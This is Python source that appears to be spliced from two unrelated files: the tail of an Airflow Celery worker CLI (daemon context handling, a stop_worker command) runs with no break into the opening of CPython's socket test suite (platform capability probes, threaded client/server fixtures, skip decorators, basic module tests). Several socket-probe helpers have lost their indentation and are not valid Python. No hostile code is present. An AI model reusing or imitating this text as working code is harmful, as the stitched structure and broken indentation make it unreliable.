    if not settings.validate_session():
        raise SystemExit("Worker exiting, database connection precheck failed.")

    autoscale = args.autoscale
    skip_serve_logs = args.skip_serve_logs
    if autoscale is None and conf.has_option("celery", "worker_autoscale"):
        autoscale = conf.get("celery", "worker_autoscale")

    # Setup locations
    pid_file_path, stdout, stderr, log_file = setup_locations(
        process=WORKER_PROCESS_NAME,
        pid=args.pid,
        stdout=args.stdout,
        stderr=args.stderr,
        log=args.log_file,
    )

    if hasattr(celery_app.backend, 'ResultSession'):
        # Pre-create the database tables now, otherwise SQLA via Celery has a
        # race condition where one of the subprocesses can die with "Table
        # already exists" error, because SQLA checks for which tables exist,
        # then issues a CREATE TABLE, rather than doing CREATE TABLE IF NOT
        # EXISTS
        try:
            session = celery_app.backend.ResultSession()
            session.close()
        except sqlalchemy.exc.IntegrityError:
            # At least on postgres, trying to create a table that already exist
            # gives a unique constraint violation or the
            # "pg_type_typname_nsp_index" table. If this happens we can ignore
            # it, we raced to create the tables and lost.
            pass

    # backwards-compatible: https://github.com/apache/airflow/pull/21506#pullrequestreview-879893763
    celery_log_level = conf.get('logging', 'CELERY_LOGGING_LEVEL')
    if not celery_log_level:
        celery_log_level = conf.get('logging', 'LOGGING_LEVEL')

    # Setup Celery worker
    options = [
        'worker',
        '-O',
        'fair',
        '--queues',
        args.queues,
        '--concurrency',
        args.concurrency,
        '--hostname',
        args.celery_hostname,
        '--loglevel',
        celery_log_level,
        '--pidfile',
        pid_file_path,
    ]
    if autoscale:
        options.extend(['--autoscale', autoscale])
    if args.without_mingle:
        options.append('--without-mingle')
    if args.without_gossip:
        options.append('--without-gossip')

    if conf.has_option("celery", "pool"):
        pool = conf.get("celery", "pool")
        options.extend(["--pool", pool])
        # Celery pools of type eventlet and gevent use greenlets, which
        # requires monkey patching the app:
        # https://eventlet.net/doc/patching.html#monkey-patch
        # Otherwise task instances hang on the workers and are never
        # executed.
        maybe_patch_concurrency(['-P', pool])

    if args.daemon:
        # Run Celery worker as daemon
        handle = setup_logging(log_file)
        with open(stdout, 'w+') as stdout_handle, open(stderr, 'w+') as stderr_handle:
            # Bug fix: `umask` was previously assigned only under
            # `if args.umask:` but referenced unconditionally when building
            # the DaemonContext, raising UnboundLocalError whenever --umask
            # was not passed.  Only forward umask when it was provided, and
            # otherwise let python-daemon apply its own default.
            ctx_kwargs = {
                'files_preserve': [handle],
                'stdout': stdout_handle,
                'stderr': stderr_handle,
            }
            if args.umask:
                # umask arrives as an octal string, e.g. "077".
                ctx_kwargs['umask'] = int(args.umask, 8)
            ctx = daemon.DaemonContext(**ctx_kwargs)
            with ctx:
                _run_worker(options=options, skip_serve_logs=skip_serve_logs)
    else:
        # Run Celery worker in the same process
        _run_worker(options=options, skip_serve_logs=skip_serve_logs)
@cli_utils.action_cli
def stop_worker(args):
    """Sends SIGTERM to Celery worker.

    Resolves the worker PID file (explicit ``--pid`` wins over the default
    location), terminates the process if one is recorded, and removes the
    PID file so a fresh worker can start cleanly.
    """
    # Read PID from file
    if args.pid:
        pid_file_path = args.pid
    else:
        pid_file_path, _, _, _ = setup_locations(process=WORKER_PROCESS_NAME)
    pid = read_pid_from_pidfile(pid_file_path)
    # Send SIGTERM; pid is None when the file is missing or empty.
    if pid:
        try:
            worker_process = psutil.Process(pid)
            worker_process.terminate()
        except psutil.NoSuchProcess:
            # Stale PID file: the worker already exited (e.g. crashed or was
            # killed externally). Don't fail the command — still remove the
            # leftover PID file below.
            pass
    # Remove pid file
    remove_existing_pidfile(pid_file_path)
import unittest
from test import support
import errno
import io
import itertools
import socket
import select
import tempfile
import time
import traceback
import queue
import sys
import os
import platform
import array
import contextlib
from weakref import proxy
import signal
import math
import pickle
import struct
import random
import shutil
import string
import _thread as thread
import threading
# Optional dependency: tests that need subprocess workers check this
# (falsy) sentinel before using it.
try:
    import multiprocessing
except ImportError:
    multiprocessing = False
# fcntl is POSIX-only; used below for the ioctl-based VSOCK CID lookup.
try:
    import fcntl
except ImportError:
    fcntl = None

HOST = support.HOST
# test unicode string and carriage return
MSG = 'Michael Gilfix was here\u1234\r\n'.encode('utf-8')
MAIN_TIMEOUT = 60.0  # seconds; generous bound for blocking operations
VSOCKPORT = 1234  # fixed port used by the AF_VSOCK tests
AIX = platform.system() == "AIX"  # AIX's inet_pton is laxer; see bpo-29972

# The C accelerator module; some repr tests exercise it directly.
try:
    import _socket
except ImportError:
    _socket = None
def get_cid():
    """Return the local AF_VSOCK context ID (CID), or None if unavailable.

    Returns None when fcntl is missing (non-POSIX platform), when the
    socket module lacks VSOCK support, or when /dev/vsock cannot be
    opened / queried.
    """
    if fcntl is None:
        return None
    if not hasattr(socket, "IOCTL_VM_SOCKETS_GET_LOCAL_CID"):
        # This build's socket module predates VSOCK support.
        return None
    try:
        with open("/dev/vsock", "rb") as f:
            # The ioctl writes a C unsigned int back into the buffer, so the
            # buffer must be exactly struct.calcsize("I") bytes; a shorter
            # buffer would make struct.unpack() below raise struct.error,
            # which the except clause does not catch.
            buf = b"\x00" * struct.calcsize("I")
            r = fcntl.ioctl(f, socket.IOCTL_VM_SOCKETS_GET_LOCAL_CID, buf)
    except OSError:
        return None
    else:
        return struct.unpack("I", r)[0]
def _have_socket_can():
"""Check whether CAN sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_can_isotp():
"""Check whether CAN ISOTP sockets are supported on this host."""
try:
s = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_ISOTP)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_rds():
"""Check whether RDS sockets are supported on this host."""
try:
s = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_alg():
"""Check whether AF_ALG sockets are supported on this host."""
try:
s = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_qipcrtr():
"""Check whether AF_QIPCRTR sockets are supported on this host."""
try:
s = socket.socket(socket.AF_QIPCRTR, socket.SOCK_DGRAM, 0)
except (AttributeError, OSError):
return False
else:
s.close()
return True
def _have_socket_vsock():
    """Check whether AF_VSOCK sockets are supported on this host."""
    # A CID can only be read when the vsock device is usable.
    return get_cid() is not None
@contextlib.contextmanager
def socket_setdefaulttimeout(timeout):
    """Temporarily set the socket module's default timeout.

    Restores the previous default on exit, even if the body raises.
    """
    saved = socket.getdefaulttimeout()
    try:
        socket.setdefaulttimeout(timeout)
        yield
    finally:
        socket.setdefaulttimeout(saved)
# Probe platform capabilities once at import time; skip decorators on the
# test classes below key off these module-level flags.
HAVE_SOCKET_CAN = _have_socket_can()
HAVE_SOCKET_CAN_ISOTP = _have_socket_can_isotp()
HAVE_SOCKET_RDS = _have_socket_rds()
HAVE_SOCKET_ALG = _have_socket_alg()
HAVE_SOCKET_QIPCRTR = _have_socket_qipcrtr()
HAVE_SOCKET_VSOCK = _have_socket_vsock()

# Size in bytes of the int type
SIZEOF_INT = array.array("i").itemsize
class SocketTCPTest(unittest.TestCase):
    """Fixture providing a listening TCP server socket.

    setUp() binds ``self.serv`` to an ephemeral port (stored in
    ``self.port``) and puts it into the listening state.
    """

    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.port = support.bind_port(self.serv)
        self.serv.listen()

    def tearDown(self):
        self.serv.close()
        self.serv = None
class SocketUDPTest(unittest.TestCase):
    """Fixture providing a bound UDP server socket.

    setUp() binds ``self.serv`` to an ephemeral port (stored in
    ``self.port``); no listen() — UDP is connectionless.
    """

    def setUp(self):
        self.serv = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.port = support.bind_port(self.serv)

    def tearDown(self):
        self.serv.close()
        self.serv = None
class ThreadSafeCleanupTestCase(unittest.TestCase):
    """Subclass of unittest.TestCase with thread-safe cleanup methods.

    This subclass protects the addCleanup() and doCleanups() methods
    with a recursive lock.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # RLock rather than Lock — presumably so a cleanup callable may
        # itself register further cleanups on the same instance; confirm
        # before changing.
        self._cleanup_lock = threading.RLock()

    def addCleanup(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().addCleanup(*args, **kwargs)

    def doCleanups(self, *args, **kwargs):
        with self._cleanup_lock:
            return super().doCleanups(*args, **kwargs)
class SocketCANTest(unittest.TestCase):
    """To be able to run this test, a `vcan0` CAN interface can be created with
    the following commands:
    # modprobe vcan
    # ip link add dev vcan0 type vcan
    # ifconfig vcan0 up
    """

    # CAN interface the fixture binds to; tests are skipped if it is missing.
    interface = 'vcan0'
    bufsize = 128

    """The CAN frame structure is defined in <linux/can.h>:

    struct can_frame {
        canid_t can_id;  /* 32 bit CAN_ID + EFF/RTR/ERR flags */
        __u8    can_dlc; /* data length code: 0 .. 8 */
        __u8    data[8] __attribute__((aligned(8)));
    };
    """
    # "=IB3x8s": native byte order, standard sizes — u32 id, u8 dlc,
    # 3 pad bytes, 8 data bytes.
    can_frame_fmt = "=IB3x8s"
    can_frame_size = struct.calcsize(can_frame_fmt)

    """The Broadcast Management Command frame structure is defined
    in <linux/can/bcm.h>:

    struct bcm_msg_head {
        __u32 opcode;
        __u32 flags;
        __u32 count;
        struct timeval ival1, ival2;
        canid_t can_id;
        __u32 nframes;
        struct can_frame frames[0];
    }

    `bcm_msg_head` must be 8 bytes aligned because of the `frames` member (see
    `struct can_frame` definition). Must use native not standard types for packing.
    """
    bcm_cmd_msg_fmt = "@3I4l2I"
    # Append pad bytes so the trailing frames[] array ends up 8-byte aligned
    # (see the alignment note in the docstring above).
    bcm_cmd_msg_fmt += "x" * (struct.calcsize(bcm_cmd_msg_fmt) % 8)

    def setUp(self):
        self.s = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        self.addCleanup(self.s.close)
        try:
            self.s.bind((self.interface,))
        except OSError:
            # No vcan0 (or equivalent) configured on this host.
            self.skipTest('network interface `%s` does not exist' %
                          self.interface)
class SocketRDSTest(unittest.TestCase):
    """To be able to run this test, the `rds` kernel module must be loaded:
    # modprobe rds
    """

    # Buffer size used by the RDS tests.
    bufsize = 8192

    def setUp(self):
        self.serv = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        self.addCleanup(self.serv.close)
        try:
            self.port = support.bind_port(self.serv)
        except OSError:
            # Module loaded but binding failed — treat as unsupported.
            self.skipTest('unable to bind RDS socket')
class ThreadableTest:
    """Threadable Test class

    The ThreadableTest class makes it easy to create a threaded
    client/server pair from an existing unit test. To create a
    new threaded class from an existing unit test, use multiple
    inheritance:

        class NewClass (OldClass, ThreadableTest):
            pass

    This class defines two new fixture functions with obvious
    purposes for overriding:

        clientSetUp ()
        clientTearDown ()

    Any new test functions within the class must then define
    tests in pairs, where the test name is preceded with a
    '_' to indicate the client portion of the test. Ex:

        def testFoo(self):
            # Server portion

        def _testFoo(self):
            # Client portion

    Any exceptions raised by the clients during their tests
    are caught and transferred to the main thread to alert
    the testing framework.

    Note, the server setup function cannot call any blocking
    functions that rely on the client thread during setup,
    unless serverExplicitReady() is called just before
    the blocking call (such as in setting up a client/server
    connection and performing the accept() in setUp().
    """

    def __init__(self):
        # Swap the true setup function: unittest calls _setUp/_tearDown,
        # which wrap the original fixtures with client-thread management.
        self.__setUp = self.setUp
        self.__tearDown = self.tearDown
        self.setUp = self._setUp
        self.tearDown = self._tearDown

    def serverExplicitReady(self):
        """This method allows the server to explicitly indicate that
        it wants the client thread to proceed. This is useful if the
        server is about to execute a blocking routine that is
        dependent upon the client thread during its setup routine."""
        self.server_ready.set()

    def _setUp(self):
        self.wait_threads = support.wait_threads_exit()
        self.wait_threads.__enter__()

        self.server_ready = threading.Event()
        self.client_ready = threading.Event()
        self.done = threading.Event()
        # Size-1 queue: carries at most one exception from the client
        # thread back to the main thread (re-raised in _tearDown).
        self.queue = queue.Queue(1)
        self.server_crashed = False

        # Do some munging to start the client test: the client method is
        # '_' + the server method name, derived from this test's id().
        methodname = self.id()
        i = methodname.rfind('.')
        methodname = methodname[i+1:]
        test_method = getattr(self, '_' + methodname)
        self.client_thread = thread.start_new_thread(
            self.clientRun, (test_method,))

        try:
            self.__setUp()
        except:
            self.server_crashed = True
            raise
        finally:
            # Release the client thread even on failure, so it can observe
            # server_crashed and tear itself down.
            self.server_ready.set()
        self.client_ready.wait()

    def _tearDown(self):
        self.__tearDown()
        self.done.wait()
        self.wait_threads.__exit__(None, None, None)

        # Re-raise any exception the client thread queued.
        if self.queue.qsize():
            exc = self.queue.get()
            raise exc

    def clientRun(self, test_func):
        # Runs in the client thread: wait for the server fixture, set up the
        # client, then execute the '_'-prefixed client half of the test.
        self.server_ready.wait()
        try:
            self.clientSetUp()
        except BaseException as e:
            self.queue.put(e)
            self.clientTearDown()
            return
        finally:
            self.client_ready.set()
        if self.server_crashed:
            self.clientTearDown()
            return
        if not hasattr(test_func, '__call__'):
            raise TypeError("test_func must be a callable function")
        try:
            test_func()
        except BaseException as e:
            self.queue.put(e)
        finally:
            self.clientTearDown()

    def clientSetUp(self):
        raise NotImplementedError("clientSetUp must be implemented.")

    def clientTearDown(self):
        self.done.set()
        thread.exit()
class ThreadedTCPSocketTest(SocketTCPTest, ThreadableTest):
    """TCP server fixture plus a client socket in the client thread."""

    def __init__(self, methodName='runTest'):
        SocketTCPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        # Runs in the client thread (see ThreadableTest).
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedUDPSocketTest(SocketUDPTest, ThreadableTest):
    """UDP server fixture plus a client socket in the client thread."""

    def __init__(self, methodName='runTest'):
        SocketUDPTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        # Runs in the client thread (see ThreadableTest).
        self.cli = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedCANSocketTest(SocketCANTest, ThreadableTest):
    """CAN server fixture plus a client CAN socket in the client thread."""

    def __init__(self, methodName='runTest'):
        SocketCANTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW)
        try:
            self.cli.bind((self.interface,))
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ThreadedRDSSocketTest(SocketRDSTest, ThreadableTest):
    """RDS server fixture plus a bound client RDS socket in the client thread."""

    def __init__(self, methodName='runTest'):
        SocketRDSTest.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        self.cli = socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0)
        try:
            # RDS sockets must be bound explicitly to send or receive data
            self.cli.bind((HOST, 0))
            self.cli_addr = self.cli.getsockname()
        except OSError:
            # skipTest should not be called here, and will be called in the
            # server instead
            pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
@unittest.skipIf(fcntl is None, "need fcntl")
@unittest.skipUnless(HAVE_SOCKET_VSOCK,
                     'VSOCK sockets required for this test.')
@unittest.skipUnless(get_cid() != 2,
                     "This test can only be run on a virtual guest.")
class ThreadedVSOCKSocketStreamTest(unittest.TestCase, ThreadableTest):
    """Client/server round-trip over an AF_VSOCK stream connection.

    The server binds to VMADDR_CID_ANY:VSOCKPORT; the client (run in the
    ThreadableTest client thread) connects to the local CID.
    """

    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.serv = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.serv.close)
        self.serv.bind((socket.VMADDR_CID_ANY, VSOCKPORT))
        self.serv.listen()
        # accept() blocks on the client connecting, so release the client
        # thread explicitly before calling it.
        self.serverExplicitReady()
        self.conn, self.connaddr = self.serv.accept()
        self.addCleanup(self.conn.close)

    def clientSetUp(self):
        time.sleep(0.1)
        self.cli = socket.socket(socket.AF_VSOCK, socket.SOCK_STREAM)
        self.addCleanup(self.cli.close)
        cid = get_cid()
        self.cli.connect((cid, VSOCKPORT))

    def testStream(self):
        # Server side: expect the exact test payload.
        msg = self.conn.recv(1024)
        self.assertEqual(msg, MSG)

    def _testStream(self):
        # Client side: send the test payload and close.
        self.cli.send(MSG)
        self.cli.close()
class SocketConnectedTest(ThreadedTCPSocketTest):
    """Socket tests for client-server connection.

    self.cli_conn is a client socket connected to the server.  The
    setUp() method guarantees that it is connected to the server.
    """

    def __init__(self, methodName='runTest'):
        ThreadedTCPSocketTest.__init__(self, methodName=methodName)

    def setUp(self):
        ThreadedTCPSocketTest.setUp(self)
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn

    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        ThreadedTCPSocketTest.tearDown(self)

    def clientSetUp(self):
        # Runs in the client thread; connects to the listening server.
        ThreadedTCPSocketTest.clientSetUp(self)
        self.cli.connect((HOST, self.port))
        self.serv_conn = self.cli

    def clientTearDown(self):
        self.serv_conn.close()
        self.serv_conn = None
        ThreadedTCPSocketTest.clientTearDown(self)
class SocketPairTest(unittest.TestCase, ThreadableTest):
    """Fixture built on socketpair(): self.serv and self.cli are the two
    already-connected ends, used by server and client thread respectively."""

    def __init__(self, methodName='runTest'):
        unittest.TestCase.__init__(self, methodName=methodName)
        ThreadableTest.__init__(self)

    def setUp(self):
        self.serv, self.cli = socket.socketpair()

    def tearDown(self):
        self.serv.close()
        self.serv = None

    def clientSetUp(self):
        # Nothing to do: the pair is already connected.
        pass

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
# The following classes are used by the sendmsg()/recvmsg() tests.
# Combining, for instance, ConnectedStreamTestMixin and TCPTestBase
# gives a drop-in replacement for SocketConnectedTest, but different
# address families can be used, and the attributes serv_addr and
# cli_addr will be set to the addresses of the endpoints.
class SocketTestBase(unittest.TestCase):
    """A base class for socket tests.

    Subclasses must provide methods newSocket() to return a new socket
    and bindSock(sock) to bind it to an unused address.

    Creates a socket self.serv and sets self.serv_addr to its address.
    """

    def setUp(self):
        self.serv = self.newSocket()
        self.bindServer()

    def bindServer(self):
        """Bind server socket and set self.serv_addr to its address."""
        self.bindSock(self.serv)
        self.serv_addr = self.serv.getsockname()

    def tearDown(self):
        self.serv.close()
        self.serv = None
class SocketListeningTestMixin(SocketTestBase):
    """Mixin to listen on the server socket."""

    def setUp(self):
        super().setUp()
        self.serv.listen()
class ThreadedSocketTestMixin(ThreadSafeCleanupTestCase, SocketTestBase,
                              ThreadableTest):
    """Mixin to add client socket and allow client/server tests.

    Client socket is self.cli and its address is self.cli_addr. See
    ThreadableTest for usage information.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        ThreadableTest.__init__(self)

    def clientSetUp(self):
        # Runs in the client thread.
        self.cli = self.newClientSocket()
        self.bindClient()

    def newClientSocket(self):
        """Return a new socket for use as client."""
        return self.newSocket()

    def bindClient(self):
        """Bind client socket and set self.cli_addr to its address."""
        self.bindSock(self.cli)
        self.cli_addr = self.cli.getsockname()

    def clientTearDown(self):
        self.cli.close()
        self.cli = None
        ThreadableTest.clientTearDown(self)
class ConnectedStreamTestMixin(SocketListeningTestMixin,
                               ThreadedSocketTestMixin):
    """Mixin to allow client/server stream tests with connected client.

    Server's socket representing connection to client is self.cli_conn
    and client's connection to server is self.serv_conn.  (Based on
    SocketConnectedTest.)
    """

    def setUp(self):
        super().setUp()
        # Indicate explicitly we're ready for the client thread to
        # proceed and then perform the blocking call to accept
        self.serverExplicitReady()
        conn, addr = self.serv.accept()
        self.cli_conn = conn

    def tearDown(self):
        self.cli_conn.close()
        self.cli_conn = None
        super().tearDown()

    def clientSetUp(self):
        super().clientSetUp()
        self.cli.connect(self.serv_addr)
        self.serv_conn = self.cli

    def clientTearDown(self):
        try:
            self.serv_conn.close()
            self.serv_conn = None
        except AttributeError:
            # serv_conn is never set if clientSetUp() failed before
            # connect(); tolerate that here so teardown still completes.
            pass
        super().clientTearDown()
class UnixSocketTestBase(SocketTestBase):
    """Base class for Unix-domain socket tests."""

    # This class is used for file descriptor passing tests, so we
    # create the sockets in a private directory so that other users
    # can't send anything that might be problematic for a privileged
    # user running the tests.

    def setUp(self):
        self.dir_path = tempfile.mkdtemp()
        self.addCleanup(os.rmdir, self.dir_path)
        super().setUp()

    def bindSock(self, sock):
        # mktemp only reserves a name: the path must NOT exist yet, because
        # binding an AF_UNIX socket creates the filesystem entry.  The usual
        # mktemp race is confined to dir_path, which mkdtemp created
        # readable/writable only by this user.
        path = tempfile.mktemp(dir=self.dir_path)
        support.bind_unix_socket(sock, path)
        self.addCleanup(support.unlink, path)
class UnixStreamBase(UnixSocketTestBase):
    """Base class for Unix-domain SOCK_STREAM tests."""

    def newSocket(self):
        # Fresh unconnected stream socket in the Unix address family.
        return socket.socket(family=socket.AF_UNIX, type=socket.SOCK_STREAM)
class InetTestBase(SocketTestBase):
    """Base class for IPv4 socket tests."""

    host = HOST

    def setUp(self):
        super().setUp()
        # Convenience alias: the ephemeral port from (host, port) serv_addr.
        self.port = self.serv_addr[1]

    def bindSock(self, sock):
        support.bind_port(sock, host=self.host)
class TCPTestBase(InetTestBase):
    """Base class for TCP-over-IPv4 tests."""

    def newSocket(self):
        # Fresh unconnected IPv4 stream socket.
        return socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM)
class UDPTestBase(InetTestBase):
    """Base class for UDP-over-IPv4 tests."""

    def newSocket(self):
        # Fresh IPv4 datagram socket.
        return socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
class SCTPStreamBase(InetTestBase):
    """Base class for SCTP tests in one-to-one (SOCK_STREAM) mode."""

    def newSocket(self):
        # Explicit IPPROTO_SCTP selects SCTP instead of the default TCP.
        return socket.socket(family=socket.AF_INET, type=socket.SOCK_STREAM,
                             proto=socket.IPPROTO_SCTP)
class Inet6TestBase(InetTestBase):
    """Base class for IPv6 socket tests."""

    # Overrides the IPv4 default with the IPv6 loopback host.
    host = support.HOSTv6
class UDP6TestBase(Inet6TestBase):
    """Base class for UDP-over-IPv6 tests."""

    def newSocket(self):
        # Fresh IPv6 datagram socket.
        return socket.socket(family=socket.AF_INET6, type=socket.SOCK_DGRAM)
# Test-skipping decorators for use with ThreadableTest.
def skipWithClientIf(condition, reason):
    """Skip decorated test if condition is true, add client_skip decorator.

    If the decorated object is not a class, sets its attribute
    "client_skip" to a decorator which will return an empty function
    if the test is to be skipped, or the original function if it is
    not. This can be used to avoid running the client part of a
    skipped test when using ThreadableTest.
    """
    def _client_noop(*args, **kwargs):
        pass

    def _skip(obj):
        decorated = unittest.skip(reason)(obj)
        if not isinstance(obj, type):
            decorated.client_skip = lambda f: _client_noop
        return decorated

    def _keep(obj):
        if not (isinstance(obj, type) or hasattr(obj, "client_skip")):
            obj.client_skip = lambda f: f
        return obj

    return _skip if condition else _keep
def requireAttrs(obj, *attributes):
    """Skip decorated test if obj is missing any of the given attributes.

    Sets client_skip attribute as skipWithClientIf() does.
    """
    absent = [attr for attr in attributes if not hasattr(obj, attr)]
    return skipWithClientIf(
        absent, "don't have " + ", ".join(absent))
def requireSocket(*args):
    """Skip decorated test if a socket cannot be created with given arguments.

    When an argument is given as a string, will use the value of that
    attribute of the socket module, or skip the test if it doesn't
    exist.  Sets client_skip attribute as skipWithClientIf() does.
    """
    err = None
    unknown = [a for a in args
               if isinstance(a, str) and not hasattr(socket, a)]
    if unknown:
        err = "don't have " + ", ".join(unknown)
    else:
        resolved = [getattr(socket, a) if isinstance(a, str) else a
                    for a in args]
        try:
            probe = socket.socket(*resolved)
        except OSError as e:
            # XXX: check errno?
            err = str(e)
        else:
            probe.close()
    return skipWithClientIf(
        err is not None,
        "can't create socket({0}): {1}".format(
            ", ".join(str(o) for o in args), err))
#######################################################################
## Begin Tests
class GeneralModuleTests(unittest.TestCase):
    def test_SocketType_is_socketobject(self):
        """socket.SocketType must be the C-level _socket.socket type."""
        import _socket
        self.assertTrue(socket.SocketType is _socket.socket)
        s = socket.socket()
        self.assertIsInstance(s, socket.SocketType)
        s.close()
    def test_repr(self):
        """repr() of a socket shows fd/family/type/proto, laddr once bound,
        and '[closed]' (without laddr) after the socket is closed."""
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        with s:
            self.assertIn('fd=%i' % s.fileno(), repr(s))
            self.assertIn('family=%s' % socket.AF_INET, repr(s))
            self.assertIn('type=%s' % socket.SOCK_STREAM, repr(s))
            self.assertIn('proto=0', repr(s))
            self.assertNotIn('raddr', repr(s))
            s.bind(('127.0.0.1', 0))
            self.assertIn('laddr', repr(s))
            self.assertIn(str(s.getsockname()), repr(s))
        # Leaving the `with` block closed the socket.
        self.assertIn('[closed]', repr(s))
        self.assertNotIn('laddr', repr(s))
    @unittest.skipUnless(_socket is not None, 'need _socket module')
    def test_csocket_repr(self):
        """repr() of the C-level socket shows fd=-1 after close()."""
        s = _socket.socket(_socket.AF_INET, _socket.SOCK_STREAM)
        try:
            expected = ('<socket object, fd=%s, family=%s, type=%s, proto=%s>'
                        % (s.fileno(), s.family, s.type, s.proto))
            self.assertEqual(repr(s), expected)
        finally:
            s.close()
        expected = ('<socket object, fd=-1, family=%s, type=%s, proto=%s>'
                    % (s.family, s.type, s.proto))
        self.assertEqual(repr(s), expected)
    def test_weakref(self):
        """A socket is weakly referenceable; the proxy dies with the socket."""
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            p = proxy(s)
            self.assertEqual(p.fileno(), s.fileno())
        # Drop the last strong reference; the proxy must now be dead.
        s = None
        try:
            p.fileno()
        except ReferenceError:
            pass
        else:
            self.fail('Socket proxy still exists')
    def testSocketError(self):
        """herror and gaierror must be raisable and be OSError subclasses."""
        # Testing socket module exceptions
        msg = "Error raising socket exception (%s)."
        with self.assertRaises(OSError, msg=msg % 'OSError'):
            raise OSError
        with self.assertRaises(OSError, msg=msg % 'socket.herror'):
            raise socket.herror
        with self.assertRaises(OSError, msg=msg % 'socket.gaierror'):
            raise socket.gaierror
    def testSendtoErrors(self):
        """sendto() must raise TypeError naming the offending argument."""
        # Testing that sendto doesn't mask failures. See #10169.
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.addCleanup(s.close)
        s.bind(('', 0))
        sockname = s.getsockname()
        # 2 args
        with self.assertRaises(TypeError) as cm:
            s.sendto('\u2620', sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'str'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(5j, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'complex'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', None)
        self.assertIn('not NoneType',str(cm.exception))
        # 3 args
        with self.assertRaises(TypeError) as cm:
            s.sendto('\u2620', 0, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'str'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(5j, 0, sockname)
        self.assertEqual(str(cm.exception),
                         "a bytes-like object is required, not 'complex'")
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 0, None)
        self.assertIn('not NoneType', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 'bar', sockname)
        self.assertIn('an integer is required', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', None, None)
        self.assertIn('an integer is required', str(cm.exception))
        # wrong number of args
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo')
        self.assertIn('(1 given)', str(cm.exception))
        with self.assertRaises(TypeError) as cm:
            s.sendto(b'foo', 0, sockname, 4)
        self.assertIn('(4 given)', str(cm.exception))
    def testCrucialConstants(self):
        """Accessing mission-critical constants must not raise AttributeError."""
        # Testing for mission critical constants
        socket.AF_INET
        if socket.has_ipv6:
            socket.AF_INET6
        socket.SOCK_STREAM
        socket.SOCK_DGRAM
        socket.SOCK_RAW
        socket.SOCK_RDM
        socket.SOCK_SEQPACKET
        socket.SOL_SOCKET
        socket.SO_REUSEADDR
    def testCrucialIpProtoConstants(self):
        """Core IPPROTO_* constants must exist (IPV6 only when has_ipv6)."""
        socket.IPPROTO_TCP
        socket.IPPROTO_UDP
        if socket.has_ipv6:
            socket.IPPROTO_IPV6
    @unittest.skipUnless(os.name == "nt", "Windows specific")
    def testWindowsSpecificConstants(self):
        """Windows-only IPPROTO_* constants must exist on nt."""
        socket.IPPROTO_ICLFXBM
        socket.IPPROTO_ST
        socket.IPPROTO_CBT
        socket.IPPROTO_IGP
        socket.IPPROTO_RDP
        socket.IPPROTO_PGM
        socket.IPPROTO_L2TP
        socket.IPPROTO_SCTP
    def testHostnameRes(self):
        """gethostbyname()/gethostbyaddr()/getfqdn() must agree for this host.

        Skips (rather than fails) when name lookup is not configured.
        """
        # Testing hostname resolution mechanisms
        hostname = socket.gethostname()
        try:
            ip = socket.gethostbyname(hostname)
        except OSError:
            # Probably name lookup wasn't set up right; skip this test
            self.skipTest('name lookup failure')
        self.assertTrue(ip.find('.') >= 0, "Error resolving host to ip.")
